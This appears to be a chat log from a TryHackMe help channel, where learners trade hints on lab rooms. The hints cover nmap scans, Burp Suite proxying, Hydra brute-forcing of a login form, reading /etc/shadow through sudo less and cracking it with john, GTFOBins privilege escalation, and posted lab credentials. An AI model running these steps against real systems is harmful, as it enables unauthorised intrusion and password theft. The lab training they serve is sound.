If you get the parentheses error for the print function, it means you are using python3 in your command, but your script has python2 syntax (feel free to correct me if I'm wrong)

Ahh ok 😯👍🏻

Thanks ☺️

could someone please give a hint as to what to do/look for [Network services - complete beginner path ] this question?
Based on the title returned to us, what do we think this port could be used for? Task 6

What is the port number? Sometimes you need to look up what the port is commonly used for in google, something like, Networking port xxxx

Check for commonly used ports in google

Here ya go, I tried some other thing but i'm stuck..

Have you tried every link on the web pages. You should have more items there... if you explore all the pages of the site...One of the page names on the site map won't have a normal name

Right.. I thought I did that already, now its showing up. One more question do you request a site and then forward it? And repeat this process for every page or?

yep: the proxy intercepts every request before it is loaded, so once you request the page you need to forward the request to the browser for it to load.

Hello community. Happy new year. I'm in the nmap room, task 14 (Practical). The question asked is: Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)? How can I determine the actual target machine IP address? Thanks in advance.

Hey, can you see a green "start machine" button in one of the rooms tasks?

Yes.

It should be in task 1, once the machine has fully booted, the Machine_IP variable should change values

I hadn't used the green one. I had used the blue one on the top. Are they different?

Yes they are, in this case the attached machine is the target machine, and the Attackbox is the attacking machine you will be using to run a Nmap scan against the target machine

I see... that explains my issue!

Ok now the question turned to: " Does the target (10.10.105.118)respond to ICMP (ping) requests (Y/N)?"
All logical!!

The Attackox is an Ubuntu VM, that is kind of like your personal hacking machine that comes equipped with all the tools, it will always be the same (except when it gets updated), whereas the attached machines will always be different depending on the room/task. Sometimes you will need to attack it, or sometimes it will be a specific OS with a specific tool that you will learn about. The details are generally explained within each task.

Anytime you see the "MAchine_IP" variable, you can safely assume that there is a machine that needs to be booted for it to populate.

right! Well thanks a bunch @unborn moon

Gave +1 Rep to @unborn moon

Hello ...I am unable to connect to "Hacking Your First Machine". Whenever I try, it shows a message on the screen saying that "Failed to connect to server".

Any advise to overcome this issue pleas??

Hi everyone,

Could anyone help me with the following NMAP task 14 question?
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

My results:
root@ip-10-10-11-112:~# nmap -sX --top-ports 999 10.10.11.112

Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 15:01 GMT
Nmap scan report for ip-10-10-11-112.eu-west-1.compute.internal (10.10.11.112)
Host is up (0.000045s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
389/tcp open|filtered ldap
3389/tcp open|filtered ms-wbt-server
5901/tcp open|filtered vnc-1
6001/tcp open|filtered X11:1
7777/tcp open|filtered cbt
7778/tcp open|filtered interwise

Nmap done: 1 IP address (1 host up) scanned in 95.00 seconds
root@ip-10-10-11-112:~#

I'd say the answer is 9, but it's counted wrong.

I think your command isn't quite right... it's not doing what you think (not scanning the first 999 ports necessarily):
It's scanning the most common x ports:
--top-ports <number>: Scan <number> most common ports
There's another switch that takes port ranges that should work.

Question doesn't tell you to scan top 999 port, instead it's telling you to scan ports from 1 to 999 which is -p 1-999

You're scanning the Attackbox.

Not the target machine.

You need to start the machine in Task 1.

Oh shoot.

You'll also need to add -Pn as you already know the box isn't responding to pings.

How dull of myself...i try it again, with my new command line.

I see, thanks! Just read de man again and changed my command line to: nmap -p1-999 -sX. 999 ports open

Gave +1 Rep to @peak tinsel

Also thank you for the help!

• @ivory meadow

Gave +1 Rep to @ivory meadow

• @lucid junco

• @lucid junco

Gave +1 Rep to @lucid junco

Hey guys!
I'm looking for solutions for the romms' labs. Not just answers but actual explanations. Does this exist.
Thanks

I'm not sure which room that is, but some rooms have writeups online which can have explanations
or google the room name?

Thanks @peak tinsel , will look through this

Gave +1 Rep to @peak tinsel

apologies 8012

does pwnbox in Anattacktive Directory have Kerbrute built in?

sorry AttackBox?

I am having the same issue.

Hello team. I have been stuck here after answering everything under Pyramid of Pain specifically the Host Artifacts 2 last questions. I have researched but every answer I put is incorrect. I will appreciate if I get any guidance

guys, i have one question. tryhackme, penetration tester course, website hacking, authentication bypass, username authentication. i cant enter sign up page

Why, what's the issue exactly?

http://MACHINE_IP/customers/signup

i type my attackbox IP on machine ip but cant enter sign up page

If it says "machine_ip", that means you haven't started the target machine yet

The attackbox is not the target machine, these are 2 separate machines

You have to start the target machine by pressing the green "Start machine" button that is attached to one of the tasks

oo

thank you mannn

In the Upload Vulnerabilities room it's mentioned that gobuster doesn't come on kali anymore by default. What is the reason it was removed? What was it replaced with?

I'm doing Operating System Security and am trying to su - root into Johnny's account with the password happyHack!ng but it's giving me Authentication failure

so i'm supposed to use command "su - root" which I do, it asks for password which is "happyHack!ng" and it's saying auth fail

I've tried it over a dozen time and have written it out manually in sublime then copy/pasted it

you're saying "happyHack!ng" is wrong? But that's what I typed into the answer box and it says thats the correct answer

ahhh

happyhack!ng doesnt work either, nor does HappyHack!ng

am I supposed to try every variation of cases? That's like 100's if not 1000's of varations

instructions were to check history and find the root password that was mis-typed then guess the correct version. In history it was happyHack!NG, so I put happyHack!ng into the answer box and it said this was the correct answer

if it wasnt case senstive, I could simply put the original "happyHack!NG" in and that would theoretically have also resulted in "correct-answer", that doesnt seem right..

I did read that my friend. Ah I misread it. I thought they meant he mistyped the password, not that he typed the correct password at an incorrect time

That's the one 🙂

we're in! Thanks for your Lassi 🙂

Hello team. I am currently doing SOC Analyst course on the platform. I have been stuck here after answering everything under Pyramid of Pain specifically the Host Artifacts last questions. I have researched but every answer I put is incorrect(The question is: Use your OSINT skills and provide the name of the malicious document associated with the dropped binary) The name of the malicious document Emotet's G_jugk.exe. I will appreciate if I get any guidance. Thank you.

hash hash hash... can provide more context if you are still stuck..

Thanks miklos. I have actually run the hashes on VirusTotal and MetaDefender concurrently. The solutions that I have gotten from there still do not fit as answers on the answer section. I will appreciate further guidance from you.

Gave +1 Rep to @dark coral

As I am new to this discord group I am not aware of how much you are allowed to type here in general, so I will DM you.

Same. I am new here too. We can further this discussion in the DM. Thanks

does pwnbox in Attacktive Directory have Kerbrute built in?
sorry AttackBox?

@left thunder Thank you Fontaene again for the help much appreciated. Not the first time you help lead me to the information I needed to learn from my Mistakes. 😎

Gave +1 Rep to @left thunder

Okay? Well not sure what I have done, but you are welcome 😄

I've had a issue I couldn't figure out with hydra for a while in Skynet. Your comment help me.

I’m still having authentication failure

hey for daily bugle, is the user flag for the joomla user or is it in the /home/users dir?

Never mind. I figured it out. 🤣🤣

lol I did too actually

Good job because I was ready to throw my laptop away lol I was getting frustrated lol

same, then the answer was actually super simple I was just overthinking

Lol same

Like whoops lol got frustrated for no reason😵‍💫🤣🫣

lol exactly

Hello, I think I'm having trouble understanding task 10 of JavaScript basics room. It asks me to sort an array of numbers using a JavaScript Method. But I didn't understand which one. Should I try to ascending them? or reverse them? Thanks in advance

Yes, ascending order is correct

Afternoon. I'm in room Brooklyn Nine Nine, I got ssh creds for user jake and attempting to get root and notice the user can run /usr/bin/less with sudo. Am I on the right track?

You are, yes

ooh that looks like an easy win

hi guys

i have a problem

on burpsuite: intruder

i go support login page. and send request

but i dont see my request on proxy

what options do you have enabled under Proxy -> Options? More than File extension?

and have you set up the proxy settings in your browser? Does it work on other sites?

nothing

http method, request, url are not enable

i enable all of them but again i cant get anything on proxy intercept sub tab

having only the first option ticked is fine. You could also use the burp web browser from the proxy tab. But as I said you should check the proxy settings of your browser

use system proxy settings is enable

enable dns on https is enable

is it true?

Morning all. Okay so stil in the Brooklyn Nine Nine room. I have used the sudo less command to read etc/shadow and am now using john to try and crack the passwords. But oh boy is it taking awhile! Is there a faster option? Or! Is there a way to see what files are in a directory I dont have permission to access? If I could guess the name of the flag file shouldn't I still be able to read it with sudo less even without access to the directory?

What was the name of the user flag file ?

user.txt I tried root.txt and a few others

So what was your full command ?

Beside that there should be another option to escalate, did you check out gtfobins ?

sudo less /home/amy/root.txt

Why would you look inside /home/amy for the root flag?

I guess because access was denied?

But I suggest you check gtfobins, there is a much easier way if you look closely

Okay I'll have another look

Got it! Thanks

Gave +1 Rep to @left thunder

In the brute it room my hydra command isn’t working even though it’s identical to write ups

It just says the first entries in rock you are the answer, instead of actually looking for a password

Hydra -l admin -P rockyoupath IP http-post-form “/admin:user=admin&pass=^PASS^:Username or password invalid”

Yes and write ups even use slightly different syntax and still get the answer, of which I’ve tried multiple

hydra -l admin -P <PATH_TO_WORDLIST><MACHINE_IP> http-post-form “/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid” -V

End my life

Ty

guys plz help me

tryhackme, penetration tester. burp suite intruder. task 10.

i go login page and type random username and password. and turn on proxy and click login button.

but proxy cant capture request

Did you click forward?

forward button is not active

fixed. i do it on proxy windows`s open browser part

That's one way, glad you got it fixed

? on the new room owaspapisecuritytop105w Task4 the GET request token "Authorisation-Token" is this a typo because it returns a 403 Forbidden {"success": "false", "cause": "authHeaderNotSet"}

Hi Guys,

I'm stuck with this question : What is the flag that you obtained by following along?
Task 2# :3

Have you followed along the static website that you open up?

Hi, is this the fake bank task? There are a lot of rooms on the platform, so don't hesitate to give more details than just the task number; it makes it easier for us to help if we know which room you're in 🙂

😆

yes

I couldn't find the answer

If you completed the site, it would have given you the flag.

Which room please?

Intro to Defensive Security

Task 3

If you finish the little static site, you'll get the flag here.

Thank you so much really appreciate your kind support!

Gave +1 Rep to @lucid junco

Happy hacking friend.

Try changing the “s” in Authorisation to a “z”. This tripped me up, too!

yeah thats what I wound up doing but at the time I was just wondering if it was a typo

Morning all. Doing the LazyAdmin CTF and I'm enumerating the website and I found a page that appears to be a login page for sweetrice? Is this a potential vector? I feel like I'm barking up the wrong tree..

you are semi on the right way... there is some stuff that the cms sweetrice has in vulns that will help you get a foothold

Thanks I'll look into it

Gave +1 Rep to @alpine kestrel

Hello ! I got stuck at the Volatility Room of Cyber Defence PathwaY : Task 10 , practical investigations , question : What user-agent was employed by the adversary in Case 001? I am trying to type in the command provided in the hints but I am getting this error : vol.py -f <dump> -o /dir/to/store_dump/ windows.memmap.Memmap --pid 1640 --dump~
bash: dump: No such file or directory
Any guidance would be amazing . Thankss

Hey I am in the room networkservices specially the ftp part.
Task 9 ask how many ports are open, the answer (bruteforce) is 2 but nmap shows me 1

why?

Are you scanning all ports?

You are.

Maybe wait a few mins..

weird, isn't it?

or maybe I should scan -v6 or udp ?

I got two ports.

weird, I start it again

on which port ?

Sometimes you need to give the machine 5-10 mins to boot up.

All the services etc.

Thanks 🙂

aah doesn't matter. I am going forward for the next machine. Thank you @lucid junco

Gave +1 Rep to @lucid junco

Task 4 Filesystem Interaction Continued can some one help me withis lessonplease?

i want to know if the info and videos im following should have eveything i need to go through with it ?

because my machine doesnt come up with stuff its tellig to get up

for example i dont come up with a file note

i can create the files and folders and move and delte them but whn i go through this questiion, On the deployable machine, what is the file type of "unknown1" in "tryhackme's" home directory?

my machine doesnt come up with the same things as the videoo im wacthing

What room are you doing ?
And you sure you are on the target machine and not on the attackbox?

FYI, they sent a message in #room-help as well

Oh right, nvm then, thx for letting me know as I missed that 😄

Gave +1 Rep to @unborn moon

it wont even let me get my terminal up now

im in complete beginner room

klai linux part 2

and also dont know how to verify

to show you

Lets keep the conversation in #room-help, you have already been asked to verify there

Do you still need help

Anyone around stuck on one question in (networkservice) trying to open a .txt file but it won't open.

Can you try using quotes?

Figured out the more option but still can't seem to awnser the question 🤔

i managed to open it but i can't seem to get it done!

what's the matter?

Use the get command pull the file to your attacking machine and open there.

i figured how to open it with more command but the file seems empty 🤔

try downloading the file

need some help with the cross ste scripting room task 8 ive followed every step to a tee and its not working

Looking for a nudge for foothold on cmess

DM if you still need help

Although you can take a look at walkthrough's

Man, talk about wacking your head against a wall. Anyone willing to lend a hand on Investigating Windows at all?

Get an answer faster of you just ask.

If*

LOL. Just having a hell of a time with the question "At what time did Windows first assign special privileges to a new logon?" Gone through the log back and forth, but nothing works. Nothing even matches the hint

Room: File Inclusion
Task 8 | Challenge 1 | Capture Flag1 at /etc/flag1
So I know how to do it with BurpSuite but I'm really trying to learn ZAP. Can a ZAP guru tell me what I might be doing wrong here?

🤦‍♂️

I should probably take a break

oof. Thanks

Can someone tell me what computer I am supposed to connect to in "Active Directory basics" Task 4? I sit here for like half an hour, not figuring this out. I am not getting it, sadly.

Is that the Network lab?

Network Lab? It's just a task under Cyber Introduction. I don't fully get the question. https://tryhackme.com/room/winadbasics

You need to start the machine.

Use a RDP ( I recommend Remmina) to connect with the credentials.

Then log in.

Username: THM\Administrator
Password: Password321

Hmm I could have sworn I've started it, let me check!

The machine is on Task 2.

Yup, its offline. It must have shut down. Thanks!

Hi everyone, working on the room Content Discovery, task 12.
Any of the 3 comments mentioned on the left, gives me an error, saying that the file doesnt exist.
What am I doing wrong?

The location of the word list might have changed.

it's SecLists, so just a typo in the path

Hey @nimble bridge , here's a tip that might come in handy. When typing a files path, you can use "tab" to auto complete. This can give you a good indication of if you've made a typo or not 😉 ,and clicking on tab twice will show you a list of possible files/directories (in the path)

and in zsh pressing tab 3 times or more lets you cycle through the alternatives

Hey guys, any little tip for the TakeOver ctf ? (https://tryhackme.com/room/takeover) i managed to discover 2 subdomains but now I'm one lil bit stuck

Dm

thx

Gave +1 Rep to @pine dust

Hi

did anyone completed willow ctf?

from where did i get the pass phrase

I got the password - wildflower

But couldn't find the passphrase anywhere

Passphrase - sounds like a job for ssh2john

I did like you said it didn’t work

@lucid junco

question, I'm on Red Team Engagements room an objective says "Use of white cards is permitted depending on downtime and length." What is a white card?

In an operational test, a white card is a simulated occurrence. When a system is too delicate or operationally important for the hostile team to attempt an exploitation, or when the adversarial team is unable to breach the system but still wants to assess how the system will respond to a penetration, white cards are employed

Hi all, Im doing operating System security, Task 3. I followed along beautifully logged in as Sammie, until the instructions said "we dicovered two more users" ? Jonny and Linda. There is no instruction as far as i can see to find these users? any pointers would be useful. Many thanks in advance. (Im completley new to this.)

Thankyou, I found them

I still can't seem to get this 🤔

?

when i try to open a file using "more" option it just gives me a blank file! 🙂

but that's how the file is saved if i try doing underscores and all it just says file not found. 🤔

still empty, but it does have weight "358" so there must be something in the file 🤔

double quotes 😄